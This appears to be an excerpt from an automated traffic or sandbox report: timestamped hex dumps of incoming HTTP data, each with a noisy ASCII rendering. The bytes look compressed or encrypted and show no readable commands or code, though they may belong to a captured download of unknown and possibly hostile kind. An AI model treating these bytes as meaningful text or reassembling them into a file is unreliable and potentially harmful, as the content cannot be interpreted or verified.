                                                                                                                                                    2022-09-29 12:59:14 UTC21623INData Raw: f7 f5 e3 70 aa 20 29 0c 91 71 9b 55 e4 fd 45 75 29 f5 fc 88 9d a4 58 03 96 80 1e a9 ba 36 b3 11 cd d5 26 04 cd 80 14 1d 85 54 9d 7b 2e d3 57 60 80 33 8c 71 8c c1 64 a2 70 9f 2b 2f a9 25 11 5c aa 6e b5 d0 44 60 42 e4 b2 ea 89 99 d5 1c 06 aa e2 ae 0e da a0 6f 77 5f 1c e7 0c 1d 87 62 56 a2 ea b3 02 63 c9 66 12 cc b6 d5 90 de f2 a8 94 eb b2 5e c3 0a d9 29 0a db 95 5e 74 d8 ba b4 c6 07 02 b3 6f 8a 36 2b 58 b5 f4 c7 7a 8c 15 37 09 22 5d 1c 4d f3 3e 97 85 8d a8 0c 8e a2 80 29 d1 a3 d6 24 2f ed ee bc c6 c5 94 c4 68 3d 21 af fe 3f be c5 29 23 53 8d 49 7c 75 7f 9f 84 7f bb 3c 82 4a 56 20 49 b4 3f 2f 8b 17 97 8e c0 c4 e6 4b b9 99 b8 4c f4 c2 af 96 17 38 72 72 d9 95 b0 37 5f 6f 4f df d9 30 06 ae 7d 62 f4 43 33 7e 37 8c e8 47 69 19 cb ab ac 3a 63 ed 49 da fc 47 96 87
                                                                                                                                                    Data Ascii: p )qUEu)X6&T{.W`3qdp+/%\nD`Bow_bVcf^)^to6+Xz7"]M>)$/h=!?)#SI|u<JV I?/KL8rr7_oO0}bC3~7Gi:cIG
                                                                                                                                                    2022-09-29 12:59:14 UTC21639INData Raw: af d9 91 11 d6 82 3b f5 19 c5 33 64 84 5f cc 83 6f 8d 57 aa 14 ae 03 1f cf b0 78 d9 cc 57 16 0e cf 20 51 9b 2c a0 15 e0 04 de b3 de a0 20 1d 09 cb e3 3b 1c 04 da 77 16 57 03 45 26 91 52 f2 38 61 b7 a0 08 dc 48 0e b7 1b e2 ef 9a e1 c5 fd de 9e a4 05 12 7e 47 c4 2a 51 8b d3 ff c0 84 4b a9 76 1e 50 9f ee 04 fd 94 94 fc 35 33 84 34 d9 b5 69 2e 72 3d 5a 1d 38 b3 98 c0 78 fe 9c 23 a1 2a 3e 81 2c 96 f1 3e 0a b6 e7 9a 37 f6 ac 19 de 6e 7f 2e 02 e9 bf b6 30 e4 18 58 27 bf 8c 93 09 79 d0 88 11 81 30 1d fd 90 93 46 90 54 35 aa 7e 1d 32 fd ea 20 fb eb 97 6e 2a d3 df a7 15 15 c7 ab af 6f ce 45 fc 42 ec 36 c5 39 f9 c6 2b 3a bf 66 b6 b1 b7 60 b1 54 89 7a c8 a6 11 39 b8 41 c7 d0 38 a5 39 ff a3 68 bc 09 e2 0b a2 00 57 cc 83 e6 dc a6 50 39 aa af 2e 9b 7d f4 c8 41 d4 97 e5
                                                                                                                                                    Data Ascii: ;3d_oWxW Q, ;wWE&R8aH~G*QKvP534i.r=Z8x#*>,>7n.0X'y0FT5~2 n*oEB69+:f`Tz9A89hWP9.}A
                                                                                                                                                    2022-09-29 12:59:14 UTC21655INData Raw: b0 e0 d2 66 27 8d 57 80 9d 99 dc 15 c5 f7 7c 31 7b 29 d4 63 4a 49 70 39 5d ab 49 9a 98 b2 30 07 c6 63 13 cc e3 5d 44 0c 63 58 ff 7a f4 3d fe 7d 6b c8 ec d2 a1 06 ff 49 e1 a5 e2 88 3d 64 47 71 8f 30 ca 02 cf bb 74 bd 77 37 a4 b9 4d 8c 0d d1 da 8d 98 7b 08 a2 16 25 ce 31 5c 13 a8 18 2e b8 64 5f 09 2c 5d af 62 02 b3 7e 53 4f c2 39 76 15 7c 4b e0 01 3b 49 25 b0 d3 fe d4 80 e6 43 4d 08 7c bc 3a 01 42 53 a8 3e e7 97 e7 ee 16 58 84 32 26 5d 28 5e cf fc 36 70 30 9a 0e 9b bd f0 75 40 07 8b 81 22 06 0a ea e3 27 92 1a 61 ff 49 2b 27 ac 2c 8a 03 5f 30 3f d3 61 3a 4c 57 c8 ab b4 3a 64 c0 53 ac 3d f1 61 a7 57 75 03 56 25 49 8a c6 3e 64 72 ae e8 60 3c 50 4d fb de f6 70 05 94 7d 18 83 34 3a d1 ff ea e4 e8 99 c3 04 9b 9a 69 d0 ab ad 9c 76 e7 16 04 5c 61 d3 d3 38 f2 43 6b
                                                                                                                                                    Data Ascii: f'W|1{)cJIp9]I0c]DcXz=}kI=dGq0tw7M{%1\.d_,]b~SO9v|K;I%CM|:BS>X2&](^6p0u@"'aI+',_0?a:LW:dS=aWuV%I>dr`<PMp}4:iv\a8Ck
                                                                                                                                                    2022-09-29 12:59:14 UTC21671INData Raw: 8f ae cf be cc 4a 3c c7 29 3e 1f 8e 3c cd 72 bd 88 5b 6d b3 1c e7 f0 b7 04 ae 29 22 61 8b 69 3c 40 04 bb 52 50 09 76 46 6b 9e 94 9e b3 31 f1 07 a2 1c fe 96 c8 bc e4 ac 0f 0c c5 03 66 74 49 13 78 e7 7c dc 4e 1f ae 61 db e4 c5 86 a1 9e 13 23 b5 33 a5 ff 14 de c1 e3 1a 9f 04 66 4d ae 20 f8 76 85 7e 83 47 fc 05 8c ab a6 58 7d d1 fe 55 72 bc 07 7e f5 40 c4 49 88 15 aa ac 7e bf 10 52 89 01 c2 5f e2 92 55 03 db 68 93 6c 65 85 9c 3b 74 5b e9 9a ff fb a5 48 4b b2 cc b2 06 d2 b5 cd c1 05 99 38 63 79 76 70 d3 06 f4 38 06 5d de f3 60 a5 90 15 54 aa 72 1c e7 9b 48 87 de 11 b5 b8 1e 90 60 2f 23 31 45 d9 63 0f 7c 44 28 b0 8d f4 e9 df 6d 20 cf 6e 4e ea 2a 42 fe b1 bb f5 cd 6a d7 3c 83 01 55 a6 78 b3 ea 65 61 59 5c c9 4c 13 79 e6 12 09 5d bf 7a f4 a1 f3 84 8d ae 09 30 cc
                                                                                                                                                    Data Ascii: J<)><r[m)"ai<@RPvFk1ftIx|Na#3fM v~GX}Ur~@I~R_Uhle;t[HK8cyvp8]`TrH`/#1Ec|D(m nN*Bj<UxeaY\Ly]z0
                                                                                                                                                    2022-09-29 12:59:14 UTC21687INData Raw: c1 5c 42 52 a1 f6 ac 64 ef 76 5a d3 36 f9 5f ed a9 68 47 b0 22 8e 47 33 13 63 86 c9 5e fb 8d 32 d4 b7 5c 3f 8f 94 d8 31 de c9 d3 0f 5a 62 d9 07 1b 7e 0d ea 3c 5a 9b 7c c7 5a 99 9c 98 3c ab cc 3f 7d 1f 13 46 0b ae 1c f1 e8 7d 6a 51 93 00 e2 9d cf b8 01 19 c6 fd 61 5e 9a 3f 39 5e da 2f 2b 2f 5b bd 87 0d 41 00 ba a7 bf 8b 7e ba 6d 1a f8 3e 21 07 31 04 b2 ca bd 64 1e d4 63 2b d6 6f 6e 72 68 c3 5a 9d 8c eb e4 06 e0 98 ac 7d 2c fd ed fb 06 0c 08 41 48 13 04 88 93 0e 36 41 7d b4 61 56 c2 fd 1c 75 4c 00 b3 5e 55 46 c7 05 d7 90 d8 29 6e 7c 24 41 9c f1 7f c1 72 ce 17 f3 60 29 da d8 d5 fa 4a 86 b7 72 b4 18 bd a9 cd d0 85 14 f6 68 9a b4 37 44 99 3a c5 65 75 ff e1 34 bd dc 6f c3 fd 1c 14 13 20 82 fe b1 fa 3c b5 9c a8 80 8d 09 d7 97 00 c7 87 5a 2e 83 98 25 72 5c 27 8b
                                                                                                                                                    Data Ascii: \BRdvZ6_hG"G3c^2\?1Zb~<Z|Z<?}F}jQa^?9^/+/[A~m>!1dc+onrhZ},AH6A}aVuL^UF)n|$Ar`)Jrh7D:eu4o <Z.%r\'
                                                                                                                                                    2022-09-29 12:59:14 UTC21703INData Raw: e1 97 9c d2 de 61 7c 97 f0 f3 c6 d1 56 a3 3d 02 f2 2d 33 8e 7c 3a 00 84 0a 70 a3 5a 09 77 28 ce 0b d4 d5 25 20 66 c5 6e 0b 2c bd d9 64 71 ec 86 94 af 86 7f 00 f3 5b 14 95 4c f5 9a 2f 2c 07 81 59 ac fc 4c 03 29 22 17 29 1a c3 4f c9 eb b3 10 68 28 3a ba be e7 b3 98 f7 68 2c 8a 60 d9 e5 8b 55 28 7d f2 fc 0c 2f b8 2e a5 37 1d 7e 16 52 ed 40 54 94 fc f8 1e b8 5c b7 ef b7 d6 6e ab 13 e2 8c a3 d5 ce ea 3d 52 cf cd be f9 1f 87 b6 6c b3 8d dc e1 30 22 9c 57 72 ae ed 29 f6 35 77 1a 1a ca a5 75 af c3 64 69 c3 27 61 16 0a 52 37 11 ba e6 c1 0d 61 97 45 f2 cf 75 08 e7 69 09 e0 58 db 0e d6 44 76 29 0c 51 83 d2 04 d7 99 7d da 92 e2 97 15 3b 39 4e 03 37 d4 e8 83 c0 7e 0a 5e 62 9d 28 8d 16 0f c8 2c 90 10 fb 54 95 b1 d1 90 30 53 d1 9d de da 86 53 77 19 c2 0a 00 cc 8d 68 fa
                                                                                                                                                    Data Ascii: a|V=-3|:pZw(% fn,dq[L/,YL)")Oh(:h,`U(}/.7~R@T\n=Rl0"Wr)5wudi'aR7aEuiXDv)Q};9N7~^b(,T0SSwh
                                                                                                                                                    2022-09-29 12:59:14 UTC21719INData Raw: 59 89 83 3c 61 82 dd 2b af 7e e2 36 4d 5c 30 97 b2 bb 2a ab bd 9c e9 11 3a 9d 15 53 c8 36 a1 34 56 15 25 56 25 c4 21 90 d5 be 02 18 44 e9 94 48 de 3e 0c 03 b6 99 8d c2 5f d7 89 28 d3 50 03 5f b9 38 56 4a b5 da 6e 23 c5 17 13 fe 2f 7c c9 93 0a 6e 60 11 4b 9b 14 0e fb 6d 2f b8 00 66 95 e1 5e fc db 4a b3 52 65 90 5c 28 10 da 72 00 d9 f8 ce 77 14 b8 d2 22 ba 1f 37 0a 79 c9 bd fa 0e 5c 34 41 23 b2 9a 8f 96 5d 79 74 82 ff ea af 32 7d 99 17 5c 57 4f 8c f1 c8 bf 08 67 85 a3 ec be 60 44 60 38 cd d6 24 b8 29 69 b4 fd ed 67 65 b9 54 d3 aa 16 2e 6a f5 05 e3 f3 27 4d cf 65 96 de 95 fe 42 0d 0e c1 8c fe f7 5e 1b 91 aa a9 39 84 d4 b9 eb af 60 d5 82 1a f9 0b 58 8f 54 73 11 de 39 ba 80 1a 46 20 d9 56 1d 98 3d dd cf 13 89 df 8c 46 b0 53 c6 2c 7b 80 a9 42 9e 59 fc c3 19 20
                                                                                                                                                    Data Ascii: Y<a+~6M\0*:S64V%V%!DH>_(P_8VJn#/|n`Km/f^JRe\(rw"7y\4A#]yt2}\WOg`D`8$)igeT.j'MeB^9`XTs9F V=FS,{BY
                                                                                                                                                    2022-09-29 12:59:14 UTC21735INData Raw: 3d 04 54 24 16 7b 12 3c 62 e3 25 54 c5 06 01 d0 cc 31 b5 b3 29 ba 99 77 3b d7 17 71 59 90 84 58 79 4e ee 07 ae 80 f2 35 89 1a d9 1b ee 9b 32 41 78 ab 1a 07 82 82 ae b1 56 6c 0d 9f e9 52 2d d2 31 cf 2a 51 e2 ff 56 6f 4f 66 cb 52 ed 18 c2 b9 fa d8 13 6d ea 3a 80 5e 90 2e d7 f8 19 83 28 f9 e5 0f bc 39 69 9e 47 fd 51 11 64 b4 5d 99 f1 d8 85 50 0b e5 fa 7f 95 f9 d8 d0 ea 9a 44 71 50 4c 45 5a bd b6 b1 6c f2 56 ae ca d7 52 13 77 e7 53 d0 6c 48 3d 53 6b ec 00 9c 97 36 b5 71 17 a2 2b 54 d9 61 45 8b 8a 88 86 36 19 10 01 15 fb db 4d cb 62 2c 04 3f 51 67 2b 1b e5 51 0e b8 f8 2a 40 5f 6c 19 0a f0 c0 c9 70 83 0d 3d a6 f6 7e c8 f5 4d 11 cb 27 4f 99 ff 1e 54 1f 38 91 b5 43 e9 59 2a 20 c8 dc 39 b7 b4 05 a3 a8 db 62 d5 8e b8 06 3a e5 cd 84 4d 83 a9 70 5a f7 e7 61 30 08 d6
                                                                                                                                                    Data Ascii: =T${<b%T1)w;qYXyN52AxVlR-1*QVoOfRm:^.(9iGQd]PDqPLEZlVRwSlH=Sk6q+TaE6Mb,?Qg+Q*@_lp=~M'OT8CY* 9b:MpZa0
                                                                                                                                                    2022-09-29 12:59:14 UTC21751INData Raw: e0 84 04 02 72 5f 04 a7 2f 53 90 67 9b 65 35 f8 c4 b5 a6 b6 6a 66 6c 90 47 40 39 65 db 18 ee 70 29 25 ed 09 29 23 4f e7 75 8d 69 44 e7 44 13 ae 8c d5 9e 15 20 d3 54 f5 dd c6 a6 22 06 ae eb d7 34 15 3a 1e ff d3 88 12 fa 56 f8 73 b4 f9 cd cb df 5d ca 5e e5 01 98 70 0e cc 21 66 33 cc fb d9 26 31 ad 39 18 fc 8e 3a 12 e5 73 17 12 91 a3 46 cd 5b 08 23 fe 3d a3 5d 98 f0 ba ae e3 2f 0b 1f 7e c3 92 76 b4 60 4c 66 54 ee a2 b0 8e 33 fc 93 b3 32 32 5c b2 2a f3 8f af a6 ba 5a 00 3e 1c 1a 02 ac e3 c2 8b b6 07 16 10 6e 39 9b 19 e8 20 bf d8 e6 91 35 83 87 dc 7b 23 f8 13 f0 d2 79 21 b6 2b 22 b5 40 e3 64 a9 21 70 b4 4f 3d f7 e4 46 90 2a 54 81 ec c1 b8 04 42 e9 f0 62 cc 89 6d ca 79 ce 46 4d f4 51 88 c9 73 09 5f f1 01 b9 0f d0 8c 6d 14 c1 62 d2 90 17 da d4 5c f2 bd 66 52 47
                                                                                                                                                    Data Ascii: r_/Sge5jflG@9ep)%)#OuiDD T"4:Vs]^p!f3&19:sF[#=]/~v`LfT322\*Z>n9 5{#y!+"@d!pO=F*TBbmyFMQs_mb\fRG
                                                                                                                                                    2022-09-29 12:59:14 UTC21767INData Raw: 8b ff b6 da 85 d9 e4 34 90 7c 56 c8 9c 25 67 71 12 da bd 18 33 da c0 d7 b3 cb 4f c2 d3 0a a2 e2 d1 26 fb 80 b6 4b d7 ba 9d 5b 6f c8 61 89 5b 18 38 9b e4 af 67 67 e6 12 f8 84 ef 2c fe bd bb d9 9b 5b de dc fa 2f a9 20 29 9e 40 d0 d5 c2 28 93 17 f7 e2 84 7b 0c 15 4c ad 82 b5 4a cc 53 f5 5e 2e b2 d9 41 f2 4f 0f 20 c8 94 95 32 82 a8 1b 40 59 a0 ff d2 ce 0e 0f 67 34 dc 68 a2 57 4d a7 e8 43 ba 7e 04 c1 d5 e1 8e 09 29 5a 33 2d 09 75 6a 34 7e 18 b2 28 90 0e 80 5e a6 85 2d 37 f0 4f db b8 f7 24 26 01 39 c8 99 19 43 85 ae 31 06 1e bc ec ac 37 88 ad 52 8b 6b 3b 53 af d9 9e 34 c6 59 a8 3e 76 c7 d7 1a 35 b8 f5 7a b7 94 83 88 15 ba da fd eb d7 78 19 26 ad 65 6f fc e0 e6 aa 0a 8c 42 a5 c5 67 a8 04 38 6c b5 a8 21 4e 61 db d0 69 ae ae 92 3c 1d e0 62 f1 67 4e 82 15 ee e0 17
                                                                                                                                                    Data Ascii: 4|V%gq3O&K[oa[8gg,[/ )@({LJS^.AO 2@Yg4hWMC~)Z3-uj4~(^-7O$&9C17Rk;S4Y>v5zx&eoBg8l!Nai<bgN
                                                                                                                                                    2022-09-29 12:59:14 UTC21783INData Raw: 8e a0 8b 94 46 78 a9 b0 f0 7e 1e be 89 5d 18 50 0b a7 8a d8 b9 75 d6 c2 c5 f4 d0 38 f7 2e d3 a6 78 a8 ab c4 54 fc fb 31 25 60 14 48 40 e3 2a 85 04 25 30 76 e4 be 41 b6 d8 44 23 7d d1 e4 27 cb df 76 6c de a4 64 8d c9 84 bd 41 2b 11 ba 77 05 08 cb 32 20 3f f8 95 3d 92 06 e8 bb 3b 36 52 18 3a 2e 79 46 76 33 8d 28 cf 2e 97 ca e1 7e be 7b dd f8 57 06 75 e1 76 3e 9b 83 60 c3 82 0d ae b0 29 c0 ed a4 58 78 ba 18 cc 6a 6c 21 cf 95 e2 ce 65 f8 b7 3c fc 75 d0 b0 93 b3 d0 e3 63 fe 66 80 c5 6d 5b f4 13 f9 f6 ae 3d af 54 0a 87 c6 4b c9 a9 54 c4 81 d7 e6 57 b7 a3 f4 7d d1 62 37 ea b1 1d 87 4f 0b 94 8a f5 5a 5a 6d 33 b5 ab 27 2c c9 d5 4a a1 c9 ef ce 4b bd a2 d6 61 1e 63 bb d0 32 42 5f 3c b0 85 d3 15 c0 da 44 6b c0 53 89 89 5e 1f f4 85 89 55 2e 4c 37 12 38 9e fc bf ab cf
                                                                                                                                                    Data Ascii: Fx~]Pu8.xT1%`H@*%0vAD#}'vldA+w2 ?=;6R:.yFv3(.~{Wuv>`)Xxjl!e<ucfm[=TKTW}b7OZZm3',JKac2B_<DkS^U.L78
                                                                                                                                                    2022-09-29 12:59:14 UTC21799INData Raw: bb 56 19 00 12 69 95 6b 47 8e f3 7c ce d5 30 cf 0a 8d d8 8d 90 c8 70 80 02 20 32 8f 05 ae 3a 2f 8d c9 5c b9 77 3d 22 9d d6 d4 a2 7d c6 2d 4a eb 0c 7e be b6 b6 75 c4 ca e4 69 72 7b 48 fb 91 41 96 80 95 53 5e 65 9e f2 ca 06 fb 79 13 4b 3c 76 20 19 f1 fc 8f 14 5b 65 c3 5c e5 04 5b bc 56 20 cb ea b8 01 23 d2 fc ae fd 34 2b 22 c2 f6 cc df f9 a2 f0 39 f9 61 ad 19 1b ef d7 82 eb 42 9a d1 2c 95 4d 8a 69 65 4f c1 57 69 7e f3 dd 70 59 a4 ef c4 84 06 14 26 b9 0a 3e 4d 2a 5d 8e 1d fd b5 8a 22 d2 07 8f 3d 69 b3 2a 89 08 ae 0c a6 bc 36 9f b3 54 5e 3f 56 4d 5e ae 1a 25 07 1f 06 3a 0c fd 9c 27 c5 a4 05 77 79 1e d3 df b6 da 7e 43 67 df bc d2 c0 66 ce 03 c0 35 3c 5f 07 ba 20 d7 9b 89 3a ce 0d 75 2a 46 d6 f0 6a a3 25 67 3b d8 37 82 c8 82 a6 0b 48 1e 12 52 3f 4a 98 19 bf 75
                                                                                                                                                    Data Ascii: VikG|0p 2:/\w="}-J~uir{HAS^eyK<v [e\[V #4+"9aB,MieOWi~pY&>M*]"=i*6T^?VM^%:'wy~Cgf5<_ :u*Fj%g;7HR?Ju
                                                                                                                                                    2022-09-29 12:59:14 UTC21815INData Raw: 5d df 47 35 94 54 21 bf 2c 6c b0 94 4f 48 13 15 af 92 2b 1e 47 42 ce 2c 02 6f a9 ff cb d1 48 6c cf f2 9e a5 42 b0 d1 4f ee b7 3e e1 83 e2 a1 87 26 98 be 5f 90 65 84 69 66 80 57 ac ce 0b f0 eb 6d 62 d5 76 d7 c7 6c 79 6f 70 d4 82 15 00 b4 58 6f bb 6f a1 c2 46 51 5c d1 a4 4c 10 6a 74 5b a8 ff 23 1f 32 2a 67 b4 57 6e 96 30 7f d2 55 b7 1b db fe 63 da 0c 85 4b bd dd 3f cc 33 26 35 71 aa 73 13 6a af 13 cb ff 45 b0 58 0b b0 73 74 35 0b 87 5b 99 0e 64 d1 ac 89 23 ea fc 22 c0 e5 79 65 af 04 8a 66 1f 62 b5 55 fb 86 7c 15 09 74 ef a2 23 9d ed 63 27 c2 37 82 29 9d 1f 32 eb 1c 95 1c f7 49 c8 64 6c ae 77 5a 7b 16 bb 31 81 02 56 b6 86 e8 9a b2 c7 75 4f e8 63 ae a5 79 44 c3 1b a2 46 b4 83 5a b8 ff 70 ba 5a 41 8e 0d 7b ad dc 0d ca 20 9d 9b 98 81 84 5a 5c 8c 69 74 0c 50 aa
                                                                                                                                                    Data Ascii: ]G5T!,lOH+GB,oHlBO>&_eifWmbvlyopXooFQ\Ljt[#2*gWn0UcK?3&5qsjEXst5[d#"yefbU|t#c'7)2IdlwZ{1VuOcyDFZpZA{ Z\itP
                                                                                                                                                    2022-09-29 12:59:14 UTC21831INData Raw: 99 db 4c 67 81 4a 7c c4 d9 57 c3 47 4d 1b 8d 9c 8a 0a ed 8a a4 ce cc 30 95 dd c4 27 57 49 5f ad cd 0b ba cc 32 19 03 2b ab 73 e6 16 1c c1 d4 ee 1a 6a 5c cb 05 1a f7 83 56 99 66 f4 2b b6 7c 69 07 80 0e 68 0b e7 58 54 96 db a5 43 4a 22 20 34 b8 5b b5 98 ab 65 f4 4e 75 0d 7d 69 2f 0e bd b8 7e 00 65 ee ce dd 70 af 48 52 4e 79 6f 3f 7e 5d d2 29 dc 4d 40 80 8d 34 61 0d 08 08 79 f4 3a 3e 32 b4 7c af c2 c6 c9 79 6f 5e d4 48 25 6e 88 d8 64 da 29 11 1a 66 1c e9 27 6b ce 98 22 47 71 68 1d 8f 72 62 8d 7a 91 a8 36 1c 80 a5 fc 3c 41 95 35 77 12 8d 6b 03 46 26 54 aa c8 4f 78 18 ef 9e f9 b9 9a 9c c0 ee 0c 8d be 9d 8c ce 34 44 c6 12 51 21 b9 5c 29 db 73 e8 bb f6 5a 7b 12 9d f0 7b df 0a 9b 12 02 62 ef 5c cb 6d 27 9f 99 38 58 d9 77 0e ca 5d a1 b7 6e c1 96 77 47 10 0b fa 4b
                                                                                                                                                    Data Ascii: LgJ|WGM0'WI_2+sj\Vf+|ihXTCJ" 4[eNu}i/~epHRNyo?~])M@4ay:>2|yo^H%nd)f'k"Gqhrbz6<A5wkF&TOx4DQ!\)sZ{{b\m'8Xw]nwGK
                                                                                                                                                    2022-09-29 12:59:14 UTC21847INData Raw: 26 55 11 22 3e 80 71 82 9c 68 e4 34 91 ec a5 67 09 7e 5e f1 53 bc be 73 f5 d2 6e a8 87 40 c5 85 d1 64 d4 47 8e 3e 1b fe fa 39 da 10 da 3e b3 a5 c2 cb e4 5d 7c 4e 82 cd 7c 01 45 81 93 67 87 5a 97 3e 84 28 7c 4b 97 25 21 30 71 9e ff 11 40 c7 b9 da 69 dc 85 eb b1 a8 4f 8a 01 86 ca e5 33 c9 2b c4 cb 00 ba 3a 14 ad 76 a7 7a d3 71 79 a0 c6 d3 93 10 2b 7a 7a 6a 99 73 a5 db 42 98 b5 71 87 94 99 fc f6 26 61 ad c7 87 75 02 6d 46 b5 a1 15 fc 95 de 3b 75 fe c4 f9 91 63 96 a7 d7 c7 5e a0 05 9d 75 a0 0e 44 de 8f e3 36 2f e6 c6 52 fc d9 0d 71 a8 df b1 18 1b cd 00 43 f8 84 98 f3 80 b5 db a7 23 84 34 9e 31 c5 f9 32 79 4a ec 60 b6 40 25 9f 40 39 95 36 14 c4 4b 01 4d df 4d 1f 54 a8 c9 bc b0 d5 2f 1d cd 58 6b eb 2e 02 1c 77 b1 5b b8 23 96 38 12 78 85 7c 60 48 27 ac 20 af 2f
                                                                                                                                                    Data Ascii: &U">qh4g~^Ssn@dG>9>]|N|EgZ>(|K%!0q@iO3+:vzqy+zzjsBq&aumF;uc^uD6/RqC#412yJ`@%@96KMMT/Xk.w[#8x|`H' /
                                                                                                                                                    2022-09-29 12:59:14 UTC21863INData Raw: 96 be 62 60 53 2d 7f 76 cc 5b 30 c2 67 ca 7e 3e d6 b6 91 11 fe 92 a9 02 38 78 04 f9 21 aa 6e 1e 3c 07 81 2f c2 31 26 ec bc d2 7c 59 0e c0 12 76 24 74 fd 1c 9c 8e c8 57 50 e0 ed 24 da 9c 22 54 d1 19 77 e7 b1 2a d3 d8 85 79 fb c4 16 29 c2 bd 56 8c 8a 62 2e 04 fd af 24 12 17 f7 28 9c c8 9c 19 bf 62 82 42 d8 d6 60 0f 6b 19 32 5f d2 34 4f 5e 0f d0 9b bd fa c5 ab c3 9c c2 a1 02 76 7f 77 43 eb f1 04 0d d0 17 75 0a 55 be a7 33 07 ad cf 0c fc 8b aa 58 c3 49 46 a5 08 cc f9 28 75 ba 88 73 61 a8 aa 97 ed d0 0c 13 4a 55 e7 2f ae 24 6d 02 f7 90 b2 cb 39 77 a4 22 ea b1 b1 e6 53 e9 7f a1 3a 6d 5e df 0c 3c 9d 60 1f 81 f5 e9 f6 cc 2a 34 ab 89 6e 03 49 d2 74 10 20 0e 95 9b 75 a0 e7 6b f3 c4 43 ad 71 a1 99 e0 6b 46 a3 59 bc 9a a7 47 2b af f0 af 65 4d 3e 9d 80 c2 41 5a 02 c5
                                                                                                                                                    Data Ascii: b`S-v[0g~>8x!n</1&|Yv$tWP$"Tw*y)Vb.$(bB`k2_4O^vwCuU3XIF(usaJU/$m9w"S:m^<`*4nIt ukCqkFYG+eM>AZ
                                                                                                                                                    2022-09-29 12:59:14 UTC21879INData Raw: 1c 2a b8 68 5a 91 8c 8f cd 52 a2 88 ee 96 0d ae a0 0f 95 61 11 76 61 0f dd 36 66 9b 25 3d 5c 43 b9 fc f6 1f 8a f1 e3 e7 6e 40 cf 96 82 41 e3 a4 cf d3 aa 0e bc d4 ba d0 9a a0 9e 45 9b 75 ce 46 74 dc 8a 9a 7c 1d 51 dd f9 75 6b bd 41 26 b2 0f 70 e5 39 72 42 d2 5c d2 77 2a 6e d4 16 4e 94 c8 14 60 de 18 98 37 19 0b e8 bc 70 e7 51 b3 f9 45 17 17 b2 30 30 86 2c 84 98 16 9c 6b 9f a3 bb d4 f0 51 a0 9e d2 c0 84 dd b5 8d e2 7e a5 6c 4e da 58 c4 fa 79 e1 50 d4 f8 3b 0f 05 40 85 b1 07 df 39 33 84 1d 6e b2 f4 8c 07 b8 7b 6b 3e 73 60 c6 31 00 18 d6 b7 10 19 70 22 4e 12 89 ed 32 9a 4c 63 43 9c 85 39 6a 8a a5 55 be b8 3d 38 68 7d 90 16 a3 e1 a7 15 69 2c 24 58 d0 6d ae 10 8f 90 6f e2 e4 ee 25 14 c0 e4 78 e8 46 a9 52 bc 99 c1 39 b3 27 9a 37 a5 ff 5e 49 8b c0 28 55 90 ff e8
                                                                                                                                                    Data Ascii: *hZRava6f%=\Cn@AEuFt|QukA&p9rB\w*nN`7pQE00,kQ~lNXyP;@93n{k>s`1p"N2LcC9jU=8h}i,$Xmo%xFR9'7^I(U
                                                                                                                                                    2022-09-29 12:59:14 UTC21895INData Raw: 78 8a fb d8 9e 66 a3 71 88 68 5b 1a c0 72 55 9b a9 8e a3 76 4a 62 47 49 04 74 20 a2 6f 07 e1 d3 e0 15 c3 0f 1f 96 af fe ab 88 d0 14 38 83 ba d6 9d 2a 73 2e 66 0f 69 a6 b2 94 d9 5a 5d fe 31 3e 93 b8 c9 56 61 bf b5 7a ff 27 1f b9 2e 16 75 22 af 45 2f ae d4 81 f4 ca 2a 05 2a b7 c7 ea b5 50 4e 77 64 6f 2c 9c 24 9b 5f 66 b9 48 fe e3 79 48 07 ee e5 ab f3 1b 6a fc 18 6f ef 29 99 8a bb 1d 80 9b b0 1c a7 c9 54 ab 82 49 14 b2 51 07 f4 31 b5 fa 9a 6d 19 23 e8 1e a6 aa db e1 03 32 8d 28 c5 2b da 5e a2 4a 93 93 61 dc bd 23 b7 05 2d 16 4f 21 49 2d 9d 51 2d 7c 0d bc 64 72 cb 21 75 74 3b 67 0a 24 0c 8b 12 2e 48 c8 4b 65 47 c8 eb 9f ca c1 cf 9a 5c f1 1d 33 b3 86 2e 5b ce cb c3 e1 8f 8b 4c c6 84 f1 7c 61 af 1f 83 8e 7a cd 9b 4d dd 83 cf d2 9a bc 7d f0 8f 46 83 8e ae b6 06
                                                                                                                                                    Data Ascii: xfqh[rUvJbGIt o8*s.fiZ]1>Vaz'.u"E/**PNwdo,$_fHyHjo)TIQ1m#2(+^Ja#-O!I-Q-|dr!ut;g$.HKeG\3.[L|azM}F
                                                                                                                                                    2022-09-29 12:59:14 UTC21911INData Raw: 3d c4 99 a1 8f c2 8e 04 02 a5 59 99 09 e8 35 41 70 a6 0c 60 9c fb 5d 09 e0 f8 d5 20 50 2f 20 9a be a8 3c 8c 66 b9 bf 4c 65 73 3b e8 1d 47 25 19 74 69 13 56 a9 b0 8a d0 1f 06 b8 c0 52 86 45 ac e5 98 70 39 59 d8 ec d5 20 66 f7 d8 4d e0 da 38 04 18 72 71 de af 9c 4e bc 17 23 10 41 62 6e 8b 1c 97 17 f4 be 83 6f c8 ea 6e 55 e0 25 f1 bf 37 e0 32 96 c0 16 f2 61 e3 8f 2e 4c 22 5a 9a 68 31 23 d4 20 84 e0 24 38 58 a0 58 26 09 6e a2 42 55 db 8e 90 dd b6 04 e4 da 09 0d ac 28 13 cb d1 37 24 b6 ee 1b 7d 6b 1e 13 16 79 99 ed a3 90 25 e3 5e cb 62 65 28 ea 73 1a b4 5e ac 82 ee f4 47 b2 c5 04 5c 10 97 c8 f8 26 c6 96 ca 4a cd 1c 4d ef 8d 90 87 80 ba d5 c2 22 ae a3 50 63 b6 63 99 36 ea 5e d1 a6 5c 37 0d 96 b5 72 db 71 e3 38 6b b7 67 2b 2c 6b 57 1e 06 dc bf 3e 89 43 26 08 63
                                                                                                                                                    Data Ascii: =Y5Ap`] P/ <fLes;G%tiVREp9Y fM8rqN#AbnonU%72a.L"Zh1# $8XX&nBU(7$}ky%^be(s^G\&JM"Pcc6^\7rq8kg+,kW>C&c
